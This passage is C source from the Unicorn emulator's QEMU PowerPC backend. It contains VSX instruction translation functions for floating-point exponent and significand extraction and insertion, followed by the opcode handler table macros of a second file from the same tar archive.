set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t1); \ return; \ } \ tcg_gen_movi_i32(tcg_ctx, t0, uimm); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, xt, xb, t0); \ tcg_temp_free_ptr(tcg_ctx, xb); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } VSX_EXTRACT_INSERT(xxextractuw) VSX_EXTRACT_INSERT(xxinsertw) #ifdef TARGET_PPC64 static void gen_xsxexpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv rt = cpu_gpr[rD(ctx->opcode)]; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, t0, xB(ctx->opcode)); tcg_gen_extract_i64(tcg_ctx, rt, t0, 52, 11); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_xsxexpqp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, rB(ctx->opcode) + 32); tcg_gen_extract_i64(tcg_ctx, xth, xbh, 48, 15); set_cpu_vsrh(tcg_ctx, rD(ctx->opcode) + 32, xth); tcg_gen_movi_i64(tcg_ctx, xtl, 0); set_cpu_vsrl(tcg_ctx, rD(ctx->opcode) + 32, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } static void gen_xsiexpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv ra = cpu_gpr[rA(ctx->opcode)]; TCGv rb = cpu_gpr[rB(ctx->opcode)]; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); xth = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, xth, ra, 0x800FFFFFFFFFFFFF); tcg_gen_andi_i64(tcg_ctx, t0, rb, 0x7FF); tcg_gen_shli_i64(tcg_ctx, t0, t0, 52); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); /* dword[1] is undefined */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, xth); } static void gen_xsiexpqp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xah; TCGv_i64 xal; TCGv_i64 xbh; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xah = tcg_temp_new_i64(tcg_ctx); xal = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xah, rA(ctx->opcode) + 32); get_cpu_vsrl(tcg_ctx, xal, rA(ctx->opcode) + 32); xbh = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, rB(ctx->opcode) + 32); t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, xth, xah, 0x8000FFFFFFFFFFFF); tcg_gen_andi_i64(tcg_ctx, t0, xbh, 0x7FFF); tcg_gen_shli_i64(tcg_ctx, t0, t0, 48); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); set_cpu_vsrh(tcg_ctx, rD(ctx->opcode) + 32, xth); tcg_gen_mov_i64(tcg_ctx, xtl, xal); set_cpu_vsrl(tcg_ctx, rD(ctx->opcode) + 32, xtl); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xah); tcg_temp_free_i64(tcg_ctx, xal); tcg_temp_free_i64(tcg_ctx, xbh); } static void gen_xsxsigdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv rt = cpu_gpr[rD(ctx->opcode)]; TCGv_i64 t0, t1, zr, nan, exp; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } exp = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); zr = tcg_const_i64(tcg_ctx, 0); nan = tcg_const_i64(tcg_ctx, 2047); get_cpu_vsrh(tcg_ctx, t1, xB(ctx->opcode)); tcg_gen_extract_i64(tcg_ctx, exp, t1, 52, 11); tcg_gen_movi_i64(tcg_ctx, t0, 0x0010000000000000); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, zr, zr, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, nan, zr, t0); get_cpu_vsrh(tcg_ctx, t1, xB(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, rt, t0, t1, 0, 52); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, exp); tcg_temp_free_i64(tcg_ctx, zr); tcg_temp_free_i64(tcg_ctx, nan); } static void gen_xsxsigqp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0, zr, nan, exp; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, rB(ctx->opcode) + 32); get_cpu_vsrl(tcg_ctx, xbl, rB(ctx->opcode) + 32); exp = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); zr = tcg_const_i64(tcg_ctx, 0); nan = tcg_const_i64(tcg_ctx, 32767); tcg_gen_extract_i64(tcg_ctx, exp, xbh, 48, 15); tcg_gen_movi_i64(tcg_ctx, t0, 0x0001000000000000); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, zr, zr, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, nan, zr, t0); tcg_gen_deposit_i64(tcg_ctx, xth, t0, xbh, 0, 48); set_cpu_vsrh(tcg_ctx, rD(ctx->opcode) + 32, xth); tcg_gen_mov_i64(tcg_ctx, xtl, xbl); set_cpu_vsrl(tcg_ctx, rD(ctx->opcode) + 32, xtl); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, exp); tcg_temp_free_i64(tcg_ctx, zr); tcg_temp_free_i64(tcg_ctx, nan); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } #endif static void gen_xviexpsp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xah; TCGv_i64 xal; TCGv_i64 xbh; TCGv_i64 xbl; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xah = tcg_temp_new_i64(tcg_ctx); xal = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xah, xA(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xal, xA(ctx->opcode)); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, xth, xah, 0x807FFFFF807FFFFF); tcg_gen_andi_i64(tcg_ctx, t0, xbh, 0xFF000000FF); tcg_gen_shli_i64(tcg_ctx, t0, t0, 23); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_andi_i64(tcg_ctx, xtl, xal, 0x807FFFFF807FFFFF); tcg_gen_andi_i64(tcg_ctx, t0, xbl, 0xFF000000FF); tcg_gen_shli_i64(tcg_ctx, t0, t0, 23); tcg_gen_or_i64(tcg_ctx, xtl, xtl, t0); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xah); tcg_temp_free_i64(tcg_ctx, xal); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xviexpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xah; TCGv_i64 xal; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xah = tcg_temp_new_i64(tcg_ctx); xal = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xah, xA(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xal, xA(ctx->opcode)); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, xth, xah, xbh, 52, 11); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_deposit_i64(tcg_ctx, xtl, xal, xbl, 52, 11); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xah); tcg_temp_free_i64(tcg_ctx, xal); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xvxexpsp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, xth, xbh, 23); tcg_gen_andi_i64(tcg_ctx, xth, xth, 0xFF000000FF); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_shri_i64(tcg_ctx, xtl, xbl, 23); tcg_gen_andi_i64(tcg_ctx, xtl, xtl, 0xFF000000FF); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xvxexpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); tcg_gen_extract_i64(tcg_ctx, xth, xbh, 52, 11); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_extract_i64(tcg_ctx, xtl, xbl, 52, 11); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } GEN_VSX_HELPER_X2(xvxsigsp, 0x00, 0x04, 0, PPC2_ISA300) static void gen_xvxsigdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; TCGv_i64 t0, zr, nan, exp; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); exp = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); zr = tcg_const_i64(tcg_ctx, 0); nan = tcg_const_i64(tcg_ctx, 2047); tcg_gen_extract_i64(tcg_ctx, exp, xbh, 52, 11); tcg_gen_movi_i64(tcg_ctx, t0, 0x0010000000000000); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, zr, zr, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, nan, zr, t0); tcg_gen_deposit_i64(tcg_ctx, xth, t0, xbh, 0, 52); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_gen_extract_i64(tcg_ctx, exp, xbl, 52, 11); tcg_gen_movi_i64(tcg_ctx, t0, 0x0010000000000000); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, zr, zr, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, nan, zr, t0); tcg_gen_deposit_i64(tcg_ctx, xtl, t0, xbl, 0, 52); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, exp); tcg_temp_free_i64(tcg_ctx, zr); tcg_temp_free_i64(tcg_ctx, nan); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } #undef GEN_XX2FORM #undef GEN_XX3FORM #undef GEN_XX2IFORM #undef GEN_XX3_RC_FORM #undef GEN_XX3FORM_DM #undef VSX_LOGICAL ����������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate/vsx-ops.inc.c�����������������������������������������������0000664�0000000�0000000�00000046534�14675241067�0022567�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������GEN_HANDLER_E(lxsdx, 0x1F, 0x0C, 0x12, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(lxsiwax, 0x1F, 0x0C, 0x02, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(lxsiwzx, 0x1F, 0x0C, 0x00, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(lxsibzx, 0x1F, 0x0D, 0x18, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxsihzx, 0x1F, 0x0D, 0x19, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxsspx, 0x1F, 0x0C, 0x10, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(lxvd2x, 0x1F, 0x0C, 0x1A, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(lxvdsx, 0x1F, 0x0C, 0x0A, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(lxvw4x, 0x1F, 0x0C, 0x18, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(lxvh8x, 0x1F, 0x0C, 0x19, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxvb16x, 0x1F, 0x0C, 0x1B, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxvx, 0x1F, 0x0C, 0x08, 0x00000040, PPC_NONE, PPC2_ISA300), #if defined(TARGET_PPC64) GEN_HANDLER_E(lxvl, 0x1F, 0x0D, 0x08, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(lxvll, 0x1F, 0x0D, 0x09, 0, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER_E(stxsdx, 0x1F, 0xC, 0x16, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(stxsibx, 0x1F, 0xD, 0x1C, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxsihx, 0x1F, 0xD, 0x1D, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxsiwx, 0x1F, 0xC, 0x04, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(stxsspx, 0x1F, 0xC, 0x14, 0, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(stxvd2x, 0x1F, 0xC, 0x1E, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(stxvw4x, 0x1F, 0xC, 0x1C, 0, PPC_NONE, PPC2_VSX), GEN_HANDLER_E(stxvh8x, 0x1F, 0x0C, 0x1D, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxvb16x, 0x1F, 0x0C, 0x1F, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxvx, 0x1F, 0x0C, 0x0C, 0, PPC_NONE, PPC2_ISA300), #if defined(TARGET_PPC64) GEN_HANDLER_E(stxvl, 0x1F, 0x0D, 0x0C, 0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stxvll, 0x1F, 0x0D, 0x0D, 0, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER_E(mfvsrwz, 0x1F, 0x13, 0x03, 0x0000F800, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(mtvsrwa, 0x1F, 0x13, 0x06, 0x0000F800, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(mtvsrwz, 0x1F, 0x13, 0x07, 0x0000F800, PPC_NONE, PPC2_VSX207), #if defined(TARGET_PPC64) GEN_HANDLER_E(mfvsrd, 0x1F, 0x13, 0x01, 0x0000F800, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(mtvsrd, 0x1F, 0x13, 0x05, 0x0000F800, PPC_NONE, PPC2_VSX207), GEN_HANDLER_E(mfvsrld, 0X1F, 0x13, 0x09, 0x0000F800, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(mtvsrdd, 0X1F, 0x13, 0x0D, 0x0, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(mtvsrws, 0x1F, 0x13, 0x0C, 0x0000F800, PPC_NONE, PPC2_ISA300), #endif #define GEN_XX1FORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 0, PPC_NONE, fl2) #define GEN_XX2FORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 0, PPC_NONE, fl2) #define GEN_XX2FORM_EXT(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 0x00100000, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 0x00100000, PPC_NONE, fl2) #define GEN_XX2FORM_EO(name, opc2, opc3, opc4, fl2) \ GEN_HANDLER2_E_2(name, #name, 0x3C, opc2 | 0, opc3, opc4, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E_2(name, #name, 0x3C, opc2 | 1, opc3, opc4, 0, PPC_NONE, fl2) #define GEN_XX3FORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 2, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 3, opc3, 0, PPC_NONE, fl2) #define GEN_XX3FORM_NAME(name, opcname, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, opcname, 0x3C, opc2 | 0, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, opcname, 0x3C, opc2 | 1, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, opcname, 0x3C, opc2 | 2, opc3, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, opcname, 0x3C, opc2 | 3, opc3, 0, PPC_NONE, fl2) #define GEN_XX2IFORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0, opc3, 1, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 1, opc3, 1, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 2, opc3, 1, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 3, opc3, 1, PPC_NONE, fl2) #define GEN_XX3_RC_FORM(name, opc2, opc3, fl2) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x00, opc3 | 0x00, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x01, opc3 | 0x00, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x02, opc3 | 0x00, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x03, opc3 | 0x00, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x00, opc3 | 0x10, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x01, opc3 | 0x10, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x02, opc3 | 0x10, 0, PPC_NONE, fl2), \ GEN_HANDLER2_E(name, #name, 0x3C, opc2 | 0x03, opc3 | 0x10, 0, PPC_NONE, fl2) #define GEN_XX3FORM_DM(name, opc2, opc3) \ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x00, opc3|0x00, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x01, opc3|0x00, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x02, opc3|0x00, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x03, opc3|0x00, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x00, opc3|0x04, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x01, opc3|0x04, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x02, opc3|0x04, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x03, opc3|0x04, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x00, opc3|0x08, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x01, opc3|0x08, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x02, opc3|0x08, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x03, opc3|0x08, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x00, opc3|0x0C, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x01, opc3|0x0C, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x02, opc3|0x0C, 0, PPC_NONE, PPC2_VSX),\ GEN_HANDLER2_E(name, #name, 0x3C, opc2|0x03, opc3|0x0C, 0, PPC_NONE, PPC2_VSX) #define GEN_VSX_XFORM_300(name, opc2, opc3, inval) \ GEN_HANDLER_E(name, 0x3F, opc2, opc3, inval, PPC_NONE, PPC2_ISA300) #define GEN_VSX_XFORM_300_EO(name, opc2, opc3, opc4, inval) \ GEN_HANDLER_E_2(name, 0x3F, opc2, opc3, opc4, inval, PPC_NONE, PPC2_ISA300) #define GEN_VSX_Z23FORM_300(name, opc2, opc3, opc4, inval) \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x00, opc4 | 0x0, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x08, opc4 | 0x0, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x10, opc4 | 0x0, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x18, opc4 | 0x0, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x00, opc4 | 0x1, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x08, opc4 | 0x1, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x10, opc4 | 0x1, inval), \ GEN_VSX_XFORM_300_EO(name, opc2, opc3 | 0x18, opc4 | 0x1, inval) GEN_VSX_Z23FORM_300(xsrqpi, 0x05, 0x0, 0x0, 0x0), GEN_VSX_Z23FORM_300(xsrqpxp, 0x05, 0x1, 0x0, 0x0), GEN_VSX_XFORM_300_EO(xssqrtqp, 0x04, 0x19, 0x1B, 0x0), GEN_VSX_XFORM_300(xssubqp, 0x04, 0x10, 0x0), GEN_XX2FORM(xsabsdp, 0x12, 0x15, PPC2_VSX), GEN_XX2FORM(xsnabsdp, 0x12, 0x16, PPC2_VSX), GEN_XX2FORM(xsnegdp, 0x12, 0x17, PPC2_VSX), GEN_XX3FORM(xscpsgndp, 0x00, 0x16, PPC2_VSX), GEN_VSX_XFORM_300_EO(xsabsqp, 0x04, 0x19, 0x00, 0x00000001), GEN_VSX_XFORM_300_EO(xsnabsqp, 0x04, 0x19, 0x08, 0x00000001), GEN_VSX_XFORM_300_EO(xsnegqp, 0x04, 0x19, 0x10, 0x00000001), GEN_VSX_XFORM_300(xscpsgnqp, 0x04, 0x03, 0x00000001), GEN_VSX_XFORM_300_EO(xscvdpqp, 0x04, 0x1A, 0x16, 0x00000001), GEN_VSX_XFORM_300_EO(xscvqpdp, 0x04, 0x1A, 0x14, 0x0), GEN_VSX_XFORM_300_EO(xscvqpsdz, 0x04, 0x1A, 0x19, 0x00000001), GEN_VSX_XFORM_300_EO(xscvqpswz, 0x04, 0x1A, 0x09, 0x00000001), GEN_VSX_XFORM_300_EO(xscvqpudz, 0x04, 0x1A, 0x11, 0x00000001), GEN_VSX_XFORM_300_EO(xscvqpuwz, 0x04, 0x1A, 0x01, 0x00000001), #ifdef TARGET_PPC64 GEN_XX2FORM_EO(xsxexpdp, 0x16, 0x15, 0x00, PPC2_ISA300), GEN_VSX_XFORM_300_EO(xsxexpqp, 0x04, 0x19, 0x02, 0x00000001), GEN_XX2FORM_EO(xsxsigdp, 0x16, 0x15, 0x01, PPC2_ISA300), GEN_VSX_XFORM_300_EO(xsxsigqp, 0x04, 0x19, 0x12, 0x00000001), GEN_HANDLER_E(xsiexpdp, 0x3C, 0x16, 0x1C, 0, PPC_NONE, PPC2_ISA300), GEN_VSX_XFORM_300(xsiexpqp, 0x4, 0x1B, 0x00000001), #endif GEN_XX2FORM(xststdcdp, 0x14, 0x16, PPC2_ISA300), GEN_XX2FORM(xststdcsp, 0x14, 0x12, PPC2_ISA300), GEN_VSX_XFORM_300(xststdcqp, 0x04, 0x16, 0x00000001), GEN_XX3FORM(xviexpsp, 0x00, 0x1B, PPC2_ISA300), GEN_XX3FORM(xviexpdp, 0x00, 0x1F, PPC2_ISA300), GEN_XX2FORM_EO(xvxexpdp, 0x16, 0x1D, 0x00, PPC2_ISA300), GEN_XX2FORM_EO(xvxsigdp, 0x16, 0x1D, 0x01, PPC2_ISA300), 